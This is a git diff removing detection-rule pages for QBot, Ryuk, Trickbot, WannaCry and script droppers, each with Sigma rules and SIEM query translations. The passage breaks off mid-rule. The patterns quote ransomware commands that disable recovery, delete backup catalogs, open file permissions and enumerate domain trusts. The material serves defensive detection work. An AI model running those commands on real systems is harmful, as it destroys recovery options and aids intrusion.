-```
-grep -P '^(?:.*(?:.*.*\AppData\Local\Temp\\.* \\\.\pipe\\.*|.*(?:.*(?=.*.*\rundll32\.exe)(?=.*.*\.dat,#1))|.*.*\perfc\.dat.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_qbot.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_qbot.md
deleted file mode 100644
index 741a41e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_qbot.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | QBot Process Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects QBot like process executions |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/killamjr/status/1179034907932315648](https://twitter.com/killamjr/status/1179034907932315648)</li><li>[https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/](https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: QBot Process Creation
-id: 4fcac6eb-0287-4090-8eea-2602e4c20040
-status: experimental
-description: Detects QBot like process executions
-author: Florian Roth
-date: 2019/10/01
-references:
-    - https://twitter.com/killamjr/status/1179034907932315648
-    - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        ParentImage: '*\WinRAR.exe'
-        Image: '*\wscript.exe'
-    selection2:
-        CommandLine: '* /c ping.exe -n 6 127.0.0.1 & type *'
-    condition: selection1 or selection2
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "ParentImage.*.*\\WinRAR.exe" -and $_.message -match "Image.*.*\\wscript.exe") -or $_.message -match "CommandLine.*.* /c ping.exe -n 6 127.0.0.1 & type .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:*\\WinRAR.exe AND winlog.event_data.Image.keyword:*\\wscript.exe) OR winlog.event_data.CommandLine.keyword:*\ \/c\ ping.exe\ \-n\ 6\ 127.0.0.1\ &\ type\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4fcac6eb-0287-4090-8eea-2602e4c20040 <<EOF
-{
-  "metadata": {
-    "title": "QBot Process Creation",
-    "description": "Detects QBot like process executions",
-    "tags": "",
-    "query": "((winlog.event_data.ParentImage.keyword:*\\\\WinRAR.exe AND winlog.event_data.Image.keyword:*\\\\wscript.exe) OR winlog.event_data.CommandLine.keyword:*\\ \\/c\\ ping.exe\\ \\-n\\ 6\\ 127.0.0.1\\ &\\ type\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:*\\\\WinRAR.exe AND winlog.event_data.Image.keyword:*\\\\wscript.exe) OR winlog.event_data.CommandLine.keyword:*\\ \\/c\\ ping.exe\\ \\-n\\ 6\\ 127.0.0.1\\ &\\ type\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'QBot Process Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:*\\WinRAR.exe AND Image.keyword:*\\wscript.exe) OR CommandLine.keyword:* \/c ping.exe \-n 6 127.0.0.1 & type *)
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\WinRAR.exe" Image="*\\wscript.exe") OR CommandLine="* /c ping.exe -n 6 127.0.0.1 & type *") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((ParentImage="*\\WinRAR.exe" Image="*\\wscript.exe") OR CommandLine="* /c ping.exe -n 6 127.0.0.1 & type *"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\WinRAR\.exe)(?=.*.*\wscript\.exe))|.*.* /c ping\.exe -n 6 127\.0\.0\.1 & type .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_ryuk.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_ryuk.md
deleted file mode 100644
index 6a7d430..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_ryuk.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | Ryuk Ransomware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Ryuk ransomware activity |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/](https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Ryuk Ransomware
-id: c37510b8-2107-4b78-aa32-72f251e7a844
-status: experimental
-description: Detects Ryuk ransomware activity
-author: Florian Roth
-date: 2019/12/16
-references:
-    - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all:
-            - 'Microsoft\Windows\CurrentVersion\Run'
-            - 'C:\users\Public\'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*Microsoft\\Windows\\CurrentVersion\\Run.*" -and $_.message -match "CommandLine.*.*C:\\users\\Public\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*Microsoft\\Windows\\CurrentVersion\\Run* AND winlog.event_data.CommandLine.keyword:*C\:\\users\\Public\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c37510b8-2107-4b78-aa32-72f251e7a844 <<EOF
-{
-  "metadata": {
-    "title": "Ryuk Ransomware",
-    "description": "Detects Ryuk ransomware activity",
-    "tags": "",
-    "query": "(winlog.event_data.CommandLine.keyword:*Microsoft\\\\Windows\\\\CurrentVersion\\\\Run* AND winlog.event_data.CommandLine.keyword:*C\\:\\\\users\\\\Public\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*Microsoft\\\\Windows\\\\CurrentVersion\\\\Run* AND winlog.event_data.CommandLine.keyword:*C\\:\\\\users\\\\Public\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Ryuk Ransomware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*Microsoft\\Windows\\CurrentVersion\\Run* AND CommandLine.keyword:*C\:\\users\\Public\\*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*Microsoft\\Windows\\CurrentVersion\\Run*" CommandLine="*C:\\users\\Public\\*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*Microsoft\\Windows\\CurrentVersion\\Run*" CommandLine="*C:\\users\\Public\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*Microsoft\Windows\CurrentVersion\Run.*)(?=.*.*C:\users\Public\\.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_script_dropper.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_script_dropper.md
deleted file mode 100644
index ec6c16a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_script_dropper.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | WScript or CScript Dropper       |
-|:-------------------------|:------------------|
-| **Description**          | Detects wscript/cscript executions of scripts located in user directories |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Winzip</li><li>Other self-extractors</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Margaritis Dimitrios (idea), Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WScript or CScript Dropper
-id: cea72823-df4d-4567-950c-0b579eaf0846
-status: experimental
-description: Detects wscript/cscript executions of scripts located in user directories
-author: Margaritis Dimitrios (idea), Florian Roth (rule)
-date: 2019/01/16
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1064
-    - attack.t1059.005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\wscript.exe'
-            - '*\cscript.exe'
-        CommandLine:
-            - '* C:\Users\\*.jse *'
-            - '* C:\Users\\*.vbe *'
-            - '* C:\Users\\*.js *'
-            - '* C:\Users\\*.vba *'
-            - '* C:\Users\\*.vbs *'
-            - '* C:\ProgramData\\*.jse *'
-            - '* C:\ProgramData\\*.vbe *'
-            - '* C:\ProgramData\\*.js *'
-            - '* C:\ProgramData\\*.vba *'
-            - '* C:\ProgramData\\*.vbs *'
-    falsepositive:
-        ParentImage: '*\winzip*'
-    condition: selection and not falsepositive
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Winzip
-    - Other self-extractors
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\cscript.exe") -and ($_.message -match "CommandLine.*.* C:\\Users\\.*.jse .*" -or $_.message -match "CommandLine.*.* C:\\Users\\.*.vbe .*" -or $_.message -match "CommandLine.*.* C:\\Users\\.*.js .*" -or $_.message -match "CommandLine.*.* C:\\Users\\.*.vba .*" -or $_.message -match "CommandLine.*.* C:\\Users\\.*.vbs .*" -or $_.message -match "CommandLine.*.* C:\\ProgramData\\.*.jse .*" -or $_.message -match "CommandLine.*.* C:\\ProgramData\\.*.vbe .*" -or $_.message -match "CommandLine.*.* C:\\ProgramData\\.*.js .*" -or $_.message -match "CommandLine.*.* C:\\ProgramData\\.*.vba .*" -or $_.message -match "CommandLine.*.* C:\\ProgramData\\.*.vbs .*")) -and  -not ($_.message -match "ParentImage.*.*\\winzip.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\wscript.exe OR *\\cscript.exe) AND winlog.event_data.CommandLine.keyword:(*\ C\:\\Users\\*.jse\ * OR *\ C\:\\Users\\*.vbe\ * OR *\ C\:\\Users\\*.js\ * OR *\ C\:\\Users\\*.vba\ * OR *\ C\:\\Users\\*.vbs\ * OR *\ C\:\\ProgramData\\*.jse\ * OR *\ C\:\\ProgramData\\*.vbe\ * OR *\ C\:\\ProgramData\\*.js\ * OR *\ C\:\\ProgramData\\*.vba\ * OR *\ C\:\\ProgramData\\*.vbs\ *)) AND (NOT (winlog.event_data.ParentImage.keyword:*\\winzip*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cea72823-df4d-4567-950c-0b579eaf0846 <<EOF
-{
-  "metadata": {
-    "title": "WScript or CScript Dropper",
-    "description": "Detects wscript/cscript executions of scripts located in user directories",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059.005"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe) AND winlog.event_data.CommandLine.keyword:(*\\ C\\:\\\\Users\\\\*.jse\\ * OR *\\ C\\:\\\\Users\\\\*.vbe\\ * OR *\\ C\\:\\\\Users\\\\*.js\\ * OR *\\ C\\:\\\\Users\\\\*.vba\\ * OR *\\ C\\:\\\\Users\\\\*.vbs\\ * OR *\\ C\\:\\\\ProgramData\\\\*.jse\\ * OR *\\ C\\:\\\\ProgramData\\\\*.vbe\\ * OR *\\ C\\:\\\\ProgramData\\\\*.js\\ * OR *\\ C\\:\\\\ProgramData\\\\*.vba\\ * OR *\\ C\\:\\\\ProgramData\\\\*.vbs\\ *)) AND (NOT (winlog.event_data.ParentImage.keyword:*\\\\winzip*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe) AND winlog.event_data.CommandLine.keyword:(*\\ C\\:\\\\Users\\\\*.jse\\ * OR *\\ C\\:\\\\Users\\\\*.vbe\\ * OR *\\ C\\:\\\\Users\\\\*.js\\ * OR *\\ C\\:\\\\Users\\\\*.vba\\ * OR *\\ C\\:\\\\Users\\\\*.vbs\\ * OR *\\ C\\:\\\\ProgramData\\\\*.jse\\ * OR *\\ C\\:\\\\ProgramData\\\\*.vbe\\ * OR *\\ C\\:\\\\ProgramData\\\\*.js\\ * OR *\\ C\\:\\\\ProgramData\\\\*.vba\\ * OR *\\ C\\:\\\\ProgramData\\\\*.vbs\\ *)) AND (NOT (winlog.event_data.ParentImage.keyword:*\\\\winzip*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WScript or CScript Dropper'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\wscript.exe *\\cscript.exe) AND CommandLine.keyword:(* C\:\\Users\\*.jse * * C\:\\Users\\*.vbe * * C\:\\Users\\*.js * * C\:\\Users\\*.vba * * C\:\\Users\\*.vbs * * C\:\\ProgramData\\*.jse * * C\:\\ProgramData\\*.vbe * * C\:\\ProgramData\\*.js * * C\:\\ProgramData\\*.vba * * C\:\\ProgramData\\*.vbs *)) AND (NOT (ParentImage.keyword:*\\winzip*)))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\wscript.exe" OR Image="*\\cscript.exe") (CommandLine="* C:\\Users\\*.jse *" OR CommandLine="* C:\\Users\\*.vbe *" OR CommandLine="* C:\\Users\\*.js *" OR CommandLine="* C:\\Users\\*.vba *" OR CommandLine="* C:\\Users\\*.vbs *" OR CommandLine="* C:\\ProgramData\\*.jse *" OR CommandLine="* C:\\ProgramData\\*.vbe *" OR CommandLine="* C:\\ProgramData\\*.js *" OR CommandLine="* C:\\ProgramData\\*.vba *" OR CommandLine="* C:\\ProgramData\\*.vbs *")) NOT (ParentImage="*\\winzip*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\wscript.exe", "*\\cscript.exe"] CommandLine IN ["* C:\\Users\\*.jse *", "* C:\\Users\\*.vbe *", "* C:\\Users\\*.js *", "* C:\\Users\\*.vba *", "* C:\\Users\\*.vbs *", "* C:\\ProgramData\\*.jse *", "* C:\\ProgramData\\*.vbe *", "* C:\\ProgramData\\*.js *", "* C:\\ProgramData\\*.vba *", "* C:\\ProgramData\\*.vbs *"])  -(ParentImage="*\\winzip*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*.*\wscript\.exe|.*.*\cscript\.exe))(?=.*(?:.*.* C:\Users\\.*\.jse .*|.*.* C:\Users\\.*\.vbe .*|.*.* C:\Users\\.*\.js .*|.*.* C:\Users\\.*\.vba .*|.*.* C:\Users\\.*\.vbs .*|.*.* C:\ProgramData\\.*\.jse .*|.*.* C:\ProgramData\\.*\.vbe .*|.*.* C:\ProgramData\\.*\.js .*|.*.* C:\ProgramData\\.*\.vba .*|.*.* C:\ProgramData\\.*\.vbs .*))))(?=.*(?!.*(?:.*(?=.*.*\winzip.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
deleted file mode 100644
index bc60cdf..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Trickbot Malware Recon Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network. |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** | <ul><li>[T1482: Domain Trust Discovery](https://attack.mitre.org/techniques/T1482)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1482: Domain Trust Discovery](../Triggers/T1482.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Rare System Admin Activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/](https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/)</li></ul>  |
-| **Author**               | David Burkett |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Trickbot Malware Recon Activity
-id: 410ad193-a728-4107-bc79-4419789fcbf8
-status: experimental
-description: Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.
-references:
-    - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
-author: David Burkett
-date: 2019/12/28
-tags:
-    - attack.t1482
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\nltest.exe'
-        CommandLine:
-            - '/domain_trusts /all_trusts'
-            - '/domain_trusts'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Rare System Admin Activity
-level: critical
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\nltest.exe") -and ($_.message -match "/domain_trusts /all_trusts" -or $_.message -match "/domain_trusts")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\nltest.exe) AND winlog.event_data.CommandLine:("\/domain_trusts\ \/all_trusts" OR "\/domain_trusts"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/410ad193-a728-4107-bc79-4419789fcbf8 <<EOF
-{
-  "metadata": {
-    "title": "Trickbot Malware Recon Activity",
-    "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.",
-    "tags": [
-      "attack.t1482"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\nltest.exe) AND winlog.event_data.CommandLine:(\"\\/domain_trusts\\ \\/all_trusts\" OR \"\\/domain_trusts\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\nltest.exe) AND winlog.event_data.CommandLine:(\"\\/domain_trusts\\ \\/all_trusts\" OR \"\\/domain_trusts\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Trickbot Malware Recon Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\nltest.exe) AND CommandLine:("\/domain_trusts \/all_trusts" "\/domain_trusts"))
-```
-
-
-### splunk
-    
-```
-((Image="*\\nltest.exe") (CommandLine="/domain_trusts /all_trusts" OR CommandLine="/domain_trusts")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\nltest.exe"] CommandLine IN ["/domain_trusts /all_trusts", "/domain_trusts"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\nltest\.exe))(?=.*(?:.*/domain_trusts /all_trusts|.*/domain_trusts)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_wannacry.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_wannacry.md
deleted file mode 100644
index 0646ac6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_wannacry.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | WannaCry Ransomware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects WannaCry ransomware activity |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Diskpart.exe usage to manage partitions on the local hard drive</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100](https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth (rule), Tom U. @c_APT_ure (collection) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WannaCry Ransomware
-id: 41d40bff-377a-43e2-8e1b-2e543069e079
-status: experimental
-description: Detects WannaCry ransomware activity
-references:
-    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
-author: Florian Roth (rule), Tom U. @c_APT_ure (collection)
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image:
-            - '*\tasksche.exe'
-            - '*\mssecsvc.exe'
-            - '*\taskdl.exe'
-            - '*\@WanaDecryptor@*'
-            - '*\WanaDecryptor*'
-            - '*\taskhsvc.exe'
-            - '*\taskse.exe'
-            - '*\111.exe'
-            - '*\lhdfrgui.exe'
-            - '*\diskpart.exe'
-            - '*\linuxnew.exe'
-            - '*\wannacry.exe'
-    selection2:
-        CommandLine:
-            - '*icacls * /grant Everyone:F /T /C /Q*'
-            - '*bcdedit /set {default} recoveryenabled no*'
-            - '*wbadmin delete catalog -quiet*'
-            - '*@Please_Read_Me@.txt*'
-    condition: 1 of them
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Diskpart.exe usage to manage partitions on the local hard drive
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
